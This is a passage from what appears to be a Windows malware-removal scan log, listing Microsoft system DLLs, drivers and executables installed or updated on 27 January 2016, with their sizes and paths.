2016-01-27 17:32 - 2015-12-08 13:53 - 00509952 _____ (Microsoft Corporation) C:\Windows\SysWOW64\qedit.dll
2016-01-27 17:32 - 2015-12-08 13:53 - 00489984 _____ (Microsoft Corporation) C:\Windows\SysWOW64\evr.dll
2016-01-27 17:32 - 2015-12-08 13:53 - 00415744 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MP4SDECD.DLL
2016-01-27 17:32 - 2015-12-08 13:53 - 00354816 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mfplat.dll
2016-01-27 17:32 - 2015-12-08 13:53 - 00241152 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MPG4DECD.DLL
2016-01-27 17:32 - 2015-12-08 13:53 - 00241152 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MP43DECD.DLL
2016-01-27 17:32 - 2015-12-08 13:53 - 00206848 _____ (Microsoft Corporation) C:\Windows\SysWOW64\RESAMPLEDMO.DLL
2016-01-27 17:32 - 2015-12-08 13:53 - 00206848 _____ (Microsoft Corporation) C:\Windows\SysWOW64\qasf.dll
2016-01-27 17:32 - 2015-12-08 13:53 - 00193536 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ksproxy.ax
2016-01-27 17:32 - 2015-12-08 13:53 - 00153600 _____ (Microsoft Corporation) C:\Windows\SysWOW64\COLORCNV.DLL
2016-01-27 17:32 - 2015-12-08 13:53 - 00067584 _____ (Microsoft Corporation) C:\Windows\SysWOW64\devenum.dll
2016-01-27 17:32 - 2015-12-08 11:07 - 04121600 _____ (Microsoft Corporation) C:\Windows\system32\mf.dll
2016-01-27 17:32 - 2015-12-08 11:07 - 01955328 _____ (Microsoft Corporation) C:\Windows\system32\WMVENCOD.DLL
2016-01-27 17:32 - 2015-12-08 11:07 - 01888768 _____ (Microsoft Corporation) C:\Windows\system32\WMVDECOD.DLL
2016-01-27 17:32 - 2015-12-08 11:07 - 01575424 _____ (Microsoft Corporation) C:\Windows\system32\WMSPDMOE.DLL
2016-01-27 17:32 - 2015-12-08 11:07 - 01573888 _____ (Microsoft Corporation) C:\Windows\system32\quartz.dll
2016-01-27 17:32 - 2015-12-08 11:07 - 01307136 _____ (Microsoft Corporation) C:\Windows\system32\msmpeg2adec.dll
2016-01-27 17:32 - 2015-12-08 11:07 - 01232896 _____ (Microsoft Corporation) C:\Windows\system32\WMADMOD.DLL
2016-01-27 17:32 - 2015-12-08 11:07 - 01160192 _____ (Microsoft Corporation) C:\Windows\system32\MSMPEG2ENC.DLL
2016-01-27 17:32 - 2015-12-08 11:07 - 01153024 _____ (Microsoft Corporation) C:\Windows\system32\WMADMOE.DLL
2016-01-27 17:32 - 2015-12-08 11:07 - 01026048 _____ (Microsoft Corporation) C:\Windows\system32\wmpmde.dll
2016-01-27 17:32 - 2015-12-08 11:07 - 01010688 _____ (Microsoft Corporation) C:\Windows\system32\mcmde.dll
2016-01-27 17:32 - 2015-12-08 11:07 - 00978944 _____ (Microsoft Corporation) C:\Windows\system32\WMSPDMOD.DLL
2016-01-27 17:32 - 2015-12-08 11:07 - 00666112 _____ (Microsoft Corporation) C:\Windows\system32\WMVSDECD.DLL
2016-01-27 17:32 - 2015-12-08 11:07 - 00653824 _____ (Microsoft Corporation) C:\Windows\system32\MP4SDECD.DLL
2016-01-27 17:32 - 2015-12-08 11:07 - 00642048 _____ (Microsoft Corporation) C:\Windows\system32\WMVXENCD.DLL
2016-01-27 17:32 - 2015-12-08 11:07 - 00632320 _____ (Microsoft Corporation) C:\Windows\system32\evr.dll
2016-01-27 17:32 - 2015-12-08 11:07 - 00624640 _____ (Microsoft Corporation) C:\Windows\system32\qedit.dll
2016-01-27 17:32 - 2015-12-08 11:07 - 00484864 _____ (Microsoft Corporation) C:\Windows\system32\MFWMAAEC.DLL
2016-01-27 17:32 - 2015-12-08 11:07 - 00447488 _____ (Microsoft Corporation) C:\Windows\system32\WMVSENCD.DLL
2016-01-27 17:32 - 2015-12-08 11:07 - 00432128 _____ (Microsoft Corporation) C:\Windows\system32\mfplat.dll
2016-01-27 17:32 - 2015-12-08 11:07 - 00378880 _____ (Microsoft Corporation) C:\Windows\system32\SysFxUI.dll
2016-01-27 17:32 - 2015-12-08 11:07 - 00371712 _____ (Microsoft Corporation) C:\Windows\system32\qdvd.dll
2016-01-27 17:32 - 2015-12-08 11:07 - 00292352 _____ (Microsoft Corporation) C:\Windows\system32\VIDRESZR.DLL
2016-01-27 17:32 - 2015-12-08 11:07 - 00254464 _____ (Microsoft Corporation) C:\Windows\system32\qasf.dll
2016-01-27 17:32 - 2015-12-08 11:07 - 00225792 _____ (Microsoft Corporation) C:\Windows\system32\RESAMPLEDMO.DLL
2016-01-27 17:32 - 2015-12-08 11:07 - 00224768 _____ (Microsoft Corporation) C:\Windows\system32\MPG4DECD.DLL
2016-01-27 17:32 - 2015-12-08 11:07 - 00223744 _____ (Microsoft Corporation) C:\Windows\system32\MP43DECD.DLL
2016-01-27 17:32 - 2015-12-08 11:07 - 00189952 _____ (Microsoft Corporation) C:\Windows\system32\COLORCNV.DLL
2016-01-27 17:32 - 2015-12-08 11:07 - 00100864 _____ (Microsoft Corporation) C:\Windows\system32\MP3DMOD.DLL
2016-01-27 17:32 - 2015-12-08 11:07 - 00076288 _____ (Microsoft Corporation) C:\Windows\system32\devenum.dll
2016-01-27 17:32 - 2015-12-08 11:07 - 00070144 _____ (Microsoft Corporation) C:\Windows\system32\mfvdsp.dll
2016-01-27 17:32 - 2015-12-08 11:06 - 00250880 _____ (Microsoft Corporation) C:\Windows\system32\ksproxy.ax
2016-01-27 17:32 - 2015-11-13 15:09 - 00091648 _____ (Microsoft Corporation) C:\Windows\system32\mapistub.dll
2016-01-27 17:32 - 2015-11-13 15:09 - 00091648 _____ (Microsoft Corporation) C:\Windows\system32\mapi32.dll
2016-01-27 17:32 - 2015-11-13 15:08 - 00017920 _____ (Microsoft Corporation) C:\Windows\system32\fixmapi.exe
2016-01-27 17:32 - 2015-11-13 14:50 - 00076800 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mapistub.dll
2016-01-27 17:32 - 2015-11-13 14:50 - 00076800 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mapi32.dll
2016-01-27 17:32 - 2015-11-13 14:49 - 00014336 _____ (Microsoft Corporation) C:\Windows\SysWOW64\fixmapi.exe
2016-01-27 17:31 - 2015-12-23 15:13 - 00387784 _____ (Microsoft Corporation) C:\Windows\system32\iedkcs32.dll
2016-01-27 17:31 - 2015-12-23 14:52 - 00341192 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iedkcs32.dll
2016-01-27 17:31 - 2015-12-12 10:31 - 02724864 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.tlb
2016-01-27 17:31 - 2015-12-12 10:30 - 00004096 _____ (Microsoft Corporation) C:\Windows\system32\ieetwcollectorres.dll
2016-01-27 17:31 - 2015-12-12 10:16 - 00066560 _____ (Microsoft Corporation) C:\Windows\system32\iesetup.dll
2016-01-27 17:31 - 2015-12-12 10:15 - 02887168 _____ (Microsoft Corporation) C:\Windows\system32\iertutil.dll
2016-01-27 17:31 - 2015-12-12 10:15 - 00571904 _____ (Microsoft Corporation) C:\Windows\system32\vbscript.dll
2016-01-27 17:31 - 2015-12-12 10:15 - 00048640 _____ (Microsoft Corporation) C:\Windows\system32\ieetwproxystub.dll
2016-01-27 17:31 - 2015-12-12 10:07 - 06051328 _____ (Microsoft Corporation) C:\Windows\system32\jscript9.dll
2016-01-27 17:31 - 2015-12-12 10:07 - 00054784 _____ (Microsoft Corporation) C:\Windows\system32\jsproxy.dll
2016-01-27 17:31 - 2015-12-12 10:07 - 00034304 _____ (Microsoft Corporation) C:\Windows\system32\iernonce.dll
2016-01-27 17:31 - 2015-12-12 10:03 - 00615936 _____ (Microsoft Corporation) C:\Windows\system32\ieui.dll
2016-01-27 17:31 - 2015-12-12 10:02 - 20367360 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtml.dll
2016-01-27 17:31 - 2015-12-12 10:02 - 00817664 _____ (Microsoft Corporation) C:\Windows\system32\jscript.dll
2016-01-27 17:31 - 2015-12-12 10:02 - 00814080 _____ (Microsoft Corporation) C:\Windows\system32\jscript9diag.dll
2016-01-27 17:31 - 2015-12-12 10:02 - 00144384 _____ (Microsoft Corporation) C:\Windows\system32\ieUnatt.exe
2016-01-27 17:31 - 2015-12-12 10:02 - 00114688 _____ (Microsoft Corporation) C:\Windows\system32\ieetwcollector.exe
2016-01-27 17:31 - 2015-12-12 09:55 - 00968704 _____ (Microsoft Corporation) C:\Windows\system32\MsSpellCheckingFacility.exe
2016-01-27 17:31 - 2015-12-12 09:51 - 00489984 _____ (Microsoft Corporation) C:\Windows\system32\dxtmsft.dll
2016-01-27 17:31 - 2015-12-12 09:49 - 02724864 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtml.tlb
2016-01-27 17:31 - 2015-12-12 09:44 - 00077824 _____ (Microsoft Corporation) C:\Windows\system32\JavaScriptCollectionAgent.dll
2016-01-27 17:31 - 2015-12-12 09:39 - 00092160 _____ (Microsoft Corporation) C:\Windows\system32\mshtmled.dll
2016-01-27 17:31 - 2015-12-12 09:37 - 00496640 _____ (Microsoft Corporation) C:\Windows\SysWOW64\vbscript.dll
2016-01-27 17:31 - 2015-12-12 09:37 - 00315392 _____ (Microsoft Corporation) C:\Windows\system32\dxtrans.dll
2016-01-27 17:31 - 2015-12-12 09:37 - 00062464 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iesetup.dll
2016-01-27 17:31 - 2015-12-12 09:37 - 00047616 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieetwproxystub.dll
2016-01-27 17:31 - 2015-12-12 09:36 - 00341504 _____ (Microsoft Corporation) C:\Windows\SysWOW64\html.iec
2016-01-27 17:31 - 2015-12-12 09:36 - 00064000 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MshtmlDac.dll
2016-01-27 17:31 - 2015-12-12 09:35 - 00152064 _____ (Microsoft Corporation) C:\Windows\system32\occache.dll
2016-01-27 17:31 - 2015-12-12 09:33 - 02280448 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iertutil.dll
2016-01-27 17:31 - 2015-12-12 09:31 - 00047104 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jsproxy.dll
2016-01-27 17:31 - 2015-12-12 09:30 - 00030720 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iernonce.dll
2016-01-27 17:31 - 2015-12-12 09:28 - 00476160 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieui.dll
2016-01-27 17:31 - 2015-12-12 09:27 - 00663552 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript.dll
2016-01-27 17:31 - 2015-12-12 09:27 - 00620032 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript9diag.dll
2016-01-27 17:31 - 2015-12-12 09:27 - 00115712 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieUnatt.exe
2016-01-27 17:31 - 2015-12-12 09:25 - 00262144 _____ (Microsoft Corporation) C:\Windows\system32\webcheck.dll
2016-01-27 17:31 - 2015-12-12 09:23 - 00798208 _____ (Microsoft Corporation) C:\Windows\system32\msfeeds.dll
2016-01-27 17:31 - 2015-12-12 09:22 - 00718336 _____ (Microsoft Corporation) C:\Windows\system32\ie4uinit.exe
2016-01-27 17:31 - 2015-12-12 09:21 - 01359360 _____ (Microsoft Corporation) C:\Windows\system32\mshtmlmedia.dll
2016-01-27 17:31 - 2015-12-12 09:20 - 02123264 _____ (Microsoft Corporation) C:\Windows\system32\inetcpl.cpl
2016-01-27 17:31 - 2015-12-12 09:19 - 00416256 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dxtmsft.dll
2016-01-27 17:31 - 2015-12-12 09:18 - 14457856 _____ (Microsoft Corporation) C:\Windows\system32\ieframe.dll
2016-01-27 17:31 - 2015-12-12 09:14 - 00060416 _____ (Microsoft Corporation) C:\Windows\SysWOW64\JavaScriptCollectionAgent.dll
2016-01-27 17:31 - 2015-12-12 09:12 - 00168960 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msrating.dll
2016-01-27 17:31 - 2015-12-12 09:10 - 00279040 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dxtrans.dll
2016-01-27 17:31 - 2015-12-12 09:10 - 00076288 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtmled.dll
2016-01-27 17:31 - 2015-12-12 09:09 - 04610560 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript9.dll
2016-01-27 17:31 - 2015-12-12 09:08 - 00130048 _____ (Microsoft Corporation) C:\Windows\SysWOW64\occache.dll
2016-01-27 17:31 - 2015-12-12 09:06 - 02487808 _____ (Microsoft Corporation) C:\Windows\system32\wininet.dll
2016-01-27 17:31 - 2015-12-12 09:02 - 00230400 _____ (Microsoft Corporation) C:\Windows\SysWOW64\webcheck.dll
2016-01-27 17:31 - 2015-12-12 09:00 - 12856320 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieframe.dll
2016-01-27 17:31 - 2015-12-12 09:00 - 02050560 _____ (Microsoft Corporation) C:\Windows\SysWOW64\inetcpl.cpl
2016-01-27 17:31 - 2015-12-12 09:00 - 01155072 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtmlmedia.dll
2016-01-27 17:31 - 2015-12-12 09:00 - 00687104 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msfeeds.dll
2016-01-27 17:31 - 2015-12-12 08:54 - 01546752 _____ (Microsoft Corporation) C:\Windows\system32\urlmon.dll
2016-01-27 17:31 - 2015-12-12 08:42 - 00800768 _____ (Microsoft Corporation) C:\Windows\system32\ieapfltr.dll
2016-01-27 17:31 - 2015-12-12 08:41 - 02011136 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wininet.dll
2016-01-27 17:31 - 2015-12-12 08:38 - 01311744 _____ (Microsoft Corporation) C:\Windows\SysWOW64\urlmon.dll
2016-01-27 17:31 - 2015-12-12 08:36 - 00710144 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieapfltr.dll
2016-01-27 17:31 - 2015-12-08 13:53 - 00103424 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mfps.dll
2016-01-27 17:31 - 2015-12-08 13:53 - 00079872 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MP3DMOD.DLL
2016-01-27 17:31 - 2015-12-08 13:53 - 00053248 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mfvdsp.dll
2016-01-27 17:31 - 2015-12-08 13:53 - 00050176 _____ (Microsoft Corporation) C:\Windows\SysWOW64\rrinstaller.exe
2016-01-27 17:31 - 2015-12-08 13:53 - 00023040 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mfpmp.exe
2016-01-27 17:31 - 2015-12-08 13:53 - 00004608 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ksuser.dll
2016-01-27 17:31 - 2015-12-08 13:50 - 00002048 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mferror.dll
2016-01-27 17:31 - 2015-12-08 11:07 - 02777088 _____ (Microsoft Corporation) C:\Windows\system32\msmpeg2vdec.dll
2016-01-27 17:31 - 2015-12-08 11:07 - 00206848 _____ (Microsoft Corporation) C:\Windows\system32\mfps.dll
2016-01-27 17:31 - 2015-12-08 11:07 - 00055808 _____ (Microsoft Corporation) C:\Windows\system32\rrinstaller.exe
2016-01-27 17:31 - 2015-12-08 11:07 - 00005120 _____ (Microsoft Corporation) C:\Windows\system32\ksuser.dll
2016-01-27 17:31 - 2015-12-08 11:06 - 00024576 _____ (Microsoft Corporation) C:\Windows\system32\mfpmp.exe
2016-01-27 17:31 - 2015-12-08 11:04 - 00002048 _____ (Microsoft Corporation) C:\Windows\system32\mferror.dll
2016-01-27 17:31 - 2015-12-08 10:54 - 00116736 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\drmk.sys
2016-01-27 17:31 - 2015-12-08 10:12 - 00230400 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\portcls.sys
2016-01-27 17:31 - 2015-12-08 10:11 - 00005632 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\drmkaud.sys
2016-01-27 17:31 - 2015-12-08 09:58 - 03211264 _____ (Microsoft Corporation) C:\Windows\system32\win32k.sys
2016-01-27 17:30 - 2015-12-12 10:54 - 25837568 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.dll
2016-01-27 17:30 - 2015-12-12 10:15 - 00417792 _____ (Microsoft Corporation) C:\Windows\system32\html.iec
2016-01-27 17:30 - 2015-12-12 10:14 - 00088064 _____ (Microsoft Corporation) C:\Windows\system32\MshtmlDac.dll
2016-01-27 17:30 - 2015-12-12 09:40 - 00199680 _____ (Microsoft Corporation) C:\Windows\system32\msrating.dll
2016-01-27 17:28 - 2015-12-08 13:53 - 00641536 _____ (Microsoft Corporation) C:\Windows\SysWOW64\advapi32.dll
2016-01-27 17:28 - 2015-12-08 13:52 - 00312320 _____ (Microsoft Corporation) C:\Windows\SysWOW64\gdi32.dll
2016-01-27 17:28 - 2015-12-08 11:07 - 00879104 _____ (Microsoft Corporation) C:\Windows\system32\advapi32.dll
2016-01-27 17:28 - 2015-12-08 11:07 - 00405504 _____ (Microsoft Corporation) C:\Windows\system32\gdi32.dll
2016-01-27 17:28 - 2015-11-16 17:11 - 00025024 _____ (Microsoft Corporation) C:\Windows\system32\CompatTelRunner.exe
2016-01-27 17:28 - 2015-11-16 17:08 - 01381376 _____ (Microsoft Corporation) C:\Windows\system32\appraiser.dll
2016-01-27 17:28 - 2015-11-16 17:08 - 00792064 _____ (Microsoft Corporation) C:\Windows\system32\generaltel.dll
2016-01-27 17:28 - 2015-11-16 17:08 - 00705536 _____ (Microsoft Corporation) C:\Windows\system32\invagent.dll
2016-01-27 17:28 - 2015-11-16 17:08 - 00505856 _____ (Microsoft Corporation) C:\Windows\system32\devinv.dll
2016-01-27 17:28 - 2015-11-16 17:08 - 00076800 _____ (Microsoft Corporation) C:\Windows\system32\acmigration.dll
2016-01-27 17:28 - 2015-11-16 12:17 - 00210432 _____ (Microsoft Corporation) C:\Windows\system32\aepic.dll
2016-01-27 17:27 - 2015-12-30 11:08 - 05572544 _____ (Microsoft Corporation) C:\Windows\system32\ntoskrnl.exe
2016-01-27 17:27 - 2015-12-30 11:08 - 00154560 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\ksecpkg.sys
2016-01-27 17:27 - 2015-12-30 11:08 - 00095680 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\ksecdd.sys
2016-01-27 17:27 - 2015-12-30 11:05 - 01730496 _____ (Microsoft Corporation) C:\Windows\system32\ntdll.dll
2016-01-27 17:27 - 2015-12-30 11:02 - 00362496 _____ (Microsoft Corporation) C:\Windows\system32\wow64win.dll
2016-01-27 17:27 - 2015-12-30 11:02 - 00243712 _____ (Microsoft Corporation) C:\Windows\system32\wow64.dll
2016-01-27 17:27 - 2015-12-30 11:02 - 00215040 _____ (Microsoft Corporation) C:\Windows\system32\winsrv.dll
2016-01-27 17:27 - 2015-12-30 11:02 - 00210432 _____ (Microsoft Corporation) C:\Windows\system32\wdigest.dll
2016-01-27 17:27 - 2015-12-30 11:02 - 00086528 _____ (Microsoft Corporation) C:\Windows\system32\TSpkg.dll
2016-01-27 17:27 - 2015-12-30 11:02 - 00013312 _____ (Microsoft Corporation) C:\Windows\system32\wow64cpu.dll
2016-01-27 17:27 - 2015-12-30 11:01 - 01214464 _____ (Microsoft Corporation) C:\Windows\system32\rpcrt4.dll
2016-01-27 17:27 - 2015-12-30 11:01 - 00503808 _____ (Microsoft Corporation) C:\Windows\system32\srcore.dll
2016-01-27 17:27 - 2015-12-30 11:01 - 00344064 _____ (Microsoft Corporation) C:\Windows\system32\schannel.dll
2016-01-27 17:27 - 2015-12-30 11:01 - 00135680 _____ (Microsoft Corporation) C:\Windows\system32\sspicli.dll
2016-01-27 17:27 - 2015-12-30 11:01 - 00050176 _____ (Microsoft Corporation) C:\Windows\system32\srclient.dll
2016-01-27 17:27 - 2015-12-30 11:01 - 00028672 _____ (Microsoft Corporation) C:\Windows\system32\sspisrv.dll
2016-01-27 17:27 - 2015-12-30 11:01 - 00028160 _____ (Microsoft Corporation) C:\Windows\system32\secur32.dll
2016-01-27 17:27 - 2015-12-30 11:00 - 00016384 _____ (Microsoft Corporation) C:\Windows\system32\ntvdm64.dll
2016-01-27 17:27 - 2015-12-30 10:59 - 00315392 _____ (Microsoft Corporation) C:\Windows\system32\msv1_0.dll
2016-01-27 17:27 - 2015-12-30 10:59 - 00312320 _____ (Microsoft Corporation) C:\Windows\system32\ncrypt.dll
2016-01-27 17:27 - 2015-12-30 10:59 - 00060416 _____ (Microsoft Corporation) C:\Windows\system32\msobjs.dll
2016-01-27 17:27 - 2015-12-30 10:58 - 01461248 _____ (Microsoft Corporation) C:\Windows\system32\lsasrv.dll
2016-01-27 17:27 - 2015-12-30 10:58 - 00146432 _____ (Microsoft Corporation) C:\Windows\system32\msaudite.dll
2016-01-27 17:27 - 2015-12-30 10:57 - 01163264 _____ (Microsoft Corporation) C:\Windows\system32\kernel32.dll
2016-01-27 17:27 - 2015-12-30 10:57 - 00729600 _____ (Microsoft Corporation) C:\Windows\system32\kerberos.dll
2016-01-27 17:27 - 2015-12-30 10:57 - 00424448 _____ (Microsoft Corporation) C:\Windows\system32\KernelBase.dll
2016-01-27 17:27 - 2015-12-30 10:55 - 00043520 _____ (Microsoft Corporation) C:\Windows\system32\csrsrv.dll
2016-01-27 17:27 - 2015-12-30 10:55 - 00043520 _____ (Microsoft Corporation) C:\Windows\system32\cryptbase.dll
2016-01-27 17:27 - 2015-12-30 10:55 - 00022016 _____ (Microsoft Corporation) C:\Windows\system32\credssp.dll
2016-01-27 17:27 - 2015-12-30 10:54 - 00686080 _____ (Microsoft Corporation) C:\Windows\system32\adtschema.dll
2016-01-27 17:27 - 2015-12-30 10:54 - 00006656 _____ (Microsoft Corporation) C:\Windows\system32\apisetschema.dll
2016-01-27 17:27 - 2015-12-30 10:54 - 00006144 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-security-base-l1-1-0.dll
2016-01-27 17:27 - 2015-12-30 10:54 - 00005120 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-file-l1-1-0.dll
2016-01-27 17:27 - 2015-12-30 10:54 - 00004608 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-threadpool-l1-1-0.dll
2016-01-27 17:27 - 2015-12-30 10:54 - 00004608 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-processthreads-l1-1-0.dll
2016-01-27 17:27 - 2015-12-30 10:54 - 00004096 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-sysinfo-l1-1-0.dll
2016-01-27 17:27 - 2015-12-30 10:54 - 00004096 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-synch-l1-1-0.dll
2016-01-27 17:27 - 2015-12-30 10:54 - 00004096 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-localregistry-l1-1-0.dll
2016-01-27 17:27 - 2015-12-30 10:54 - 00004096 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-localization-l1-1-0.dll
2016-01-27 17:27 - 2015-12-30 10:54 - 00003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-rtlsupport-l1-1-0.dll
2016-01-27 17:27 - 2015-12-30 10:54 - 00003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-processenvironment-l1-1-0.dll
2016-01-27 17:27 - 2015-12-30 10:54 - 00003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-namedpipe-l1-1-0.dll
2016-01-27 17:27 - 2015-12-30 10:54 - 00003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-misc-l1-1-0.dll
2016-01-27 17:27 - 2015-12-30 10:54 - 00003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-memory-l1-1-0.dll
2016-01-27 17:27 - 2015-12-30 10:54 - 00003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-libraryloader-l1-1-0.dll
2016-01-27 17:27 - 2015-12-30 10:54 - 00003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-heap-l1-1-0.dll
2016-01-27 17:27 - 2015-12-30 10:54 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-xstate-l1-1-0.dll
2016-01-27 17:27 - 2015-12-30 10:54 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-util-l1-1-0.dll
2016-01-27 17:27 - 2015-12-30 10:54 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-string-l1-1-0.dll
2016-01-27 17:27 - 2015-12-30 10:54 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-profile-l1-1-0.dll
2016-01-27 17:27 - 2015-12-30 10:54 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-io-l1-1-0.dll
2016-01-27 17:27 - 2015-12-30 10:54 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-interlocked-l1-1-0.dll
2016-01-27 17:27 - 2015-12-30 10:54 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-handle-l1-1-0.dll
2016-01-27 17:27 - 2015-12-30 10:54 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-fibers-l1-1-0.dll
2016-01-27 17:27 - 2015-12-30 10:54 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-errorhandling-l1-1-0.dll
2016-01-27 17:27 - 2015-12-30 10:54 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-delayload-l1-1-0.dll
2016-01-27 17:27 - 2015-12-30 10:54 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-debug-l1-1-0.dll
2016-01-27 17:27 - 2015-12-30 10:54 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-datetime-l1-1-0.dll
2016-01-27 17:27 - 2015-12-30 10:54 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-console-l1-1-0.dll
2016-01-27 17:27 - 2015-12-30 10:47 - 03993536 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntkrnlpa.exe
2016-01-27 17:27 - 2015-12-30 10:47 - 03938240 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntoskrnl.exe
2016-01-27 17:27 - 2015-12-30 10:44 - 01311768 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntdll.dll
2016-01-27 17:27 - 2015-12-30 10:41 - 01114112 _____ (Microsoft Corporation) C:\Windows\SysWOW64\kernel32.dll
2016-01-27 17:27 - 2015-12-30 10:41 - 00665088 _____ (Microsoft Corporation) C:\Windows\SysWOW64\rpcrt4.dll
2016-01-27 17:27 - 2015-12-30 10:41 - 00274944 _____ (Microsoft Corporation) C:\Windows\SysWOW64\KernelBase.dll
2016-01-27 17:27 - 2015-12-30 10:41 - 00171520 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wdigest.dll
2016-01-27 17:27 - 2015-12-30 10:41 - 00096768 _____ (Microsoft Corporation) C:\Windows\SysWOW64\sspicli.dll
2016-01-27 17:27 - 2015-12-30 10:41 - 00065536 _____ (Microsoft Corporation) C:\Windows\SysWOW64\TSpkg.dll
2016-01-27 17:27 - 2015-12-30 10:41 - 00043008 _____ (Microsoft Corporation) C:\Windows\SysWOW64\srclient.dll
2016-01-27 17:27 - 2015-12-30 10:41 - 00005120 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wow32.dll
2016-01-27 17:27 - 2015-12-30 10:40 - 00251392 _____ (Microsoft Corporation) C:\Windows\SysWOW64\schannel.dll
2016-01-27 17:27 - 2015-12-30 10:40 - 00022016 _____ (Microsoft Corporation) C:\Windows\SysWOW64\secur32.dll
2016-01-27 17:27 - 2015-12-30 10:39 - 00259584 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msv1_0.dll
2016-01-27 17:27 - 2015-12-30 10:39 - 00223232 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ncrypt.dll
2016-01-27 17:27 - 2015-12-30 10:39 - 00146432 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msaudite.dll
2016-01-27 17:27 - 2015-12-30 10:39 - 00060416 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msobjs.dll
2016-01-27 17:27 - 2015-12-30 10:38 - 00552960 _____ (Microsoft Corporation) C:\Windows\SysWOW64\kerberos.dll
2016-01-27 17:27 - 2015-12-30 10:38 - 00017408 _____ (Microsoft Corporation) C:\Windows\SysWOW64\credssp.dll
2016-01-27 17:27 - 2015-12-30 10:37 - 00686080 _____ (Microsoft Corporation) C:\Windows\SysWOW64\adtschema.dll
2016-01-27 17:27 - 2015-12-30 10:37 - 00006656 _____ (Microsoft Corporation) C:\Windows\SysWOW64\apisetschema.dll
2016-01-27 17:27 - 2015-12-30 10:37 - 00005120 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-file-l1-1-0.dll
2016-01-27 17:27 - 2015-12-30 10:37 - 00004608 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-processthreads-l1-1-0.dll
2016-01-27 17:27 - 2015-12-30 10:37 - 00004096 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-sysinfo-l1-1-0.dll
2016-01-27 17:27 - 2015-12-30 10:37 - 00004096 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-synch-l1-1-0.dll
